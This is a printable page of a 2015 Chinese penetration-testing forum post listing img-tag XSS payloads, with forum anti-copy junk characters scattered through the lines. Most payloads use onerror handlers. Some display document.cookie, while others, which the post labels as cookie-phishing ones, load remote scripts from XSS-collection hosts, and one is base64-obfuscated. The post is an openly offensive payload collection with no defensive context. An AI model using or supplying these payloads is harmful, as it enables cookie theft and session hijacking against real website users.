中国网络渗透测试联盟

标题: img标签的常用几种测试手段 [打印本页]
作者: admin    时间: 2015-10-18 14:33
标题: img标签的常用几种测试手段
<img src='non-exist.jpg'onerror="alert('xss')">
: O" N/ w7 y6 F& {. p2 H' `6 n) n/ c<img src=# onerror=alert(123)>% {$ R% }: l; V) n4 n# W
<img src=# onerror=alert(document.cookie)>: V! A2 }0 I. y: m, \4 L" }* Q% v
下面是利用平台钓cookie的
0 g( G/ b+ J9 r# u$ }5 i7 v9 f/ J <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>$ ~; e4 |+ ~4 H4 W9 ^9 ]
$ R+ T7 @9 P  e
( z) R1 u3 b1 S5 a, [* }# |
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>/ d0 k& F, L8 e% ?( X7 C0 _
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>/ C9 u& I: S; L! w: s
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>, P, a- d+ t# L% _9 I$ y& d
<img src=1 onerror=jQuery.getScript("//xss.re/974")> ! Y$ x9 y( ?. i6 D! o: t% B4 |
<img src="#">
, D" i3 p0 L. y4 g4 b4 L& _( R<img src="#">% ]1 R$ y  w/ x" P
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
% [& b5 O  p/ R; |5 k<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
8 e8 [9 [- b  r3 q$ q<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>: l- n* @( b  h2 a) q; u4 ~
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>% h. G2 F" g$ d. @$ |. ]0 r; t  S
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
: C1 A2 O+ `( v; H<img src=x width="0" height="0"></img>5 T! S) ^. }+ r; x  t  b
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
+ a/ @0 I8 T' b2 J! l<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>0 l: y2 E3 T2 b9 [# p




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2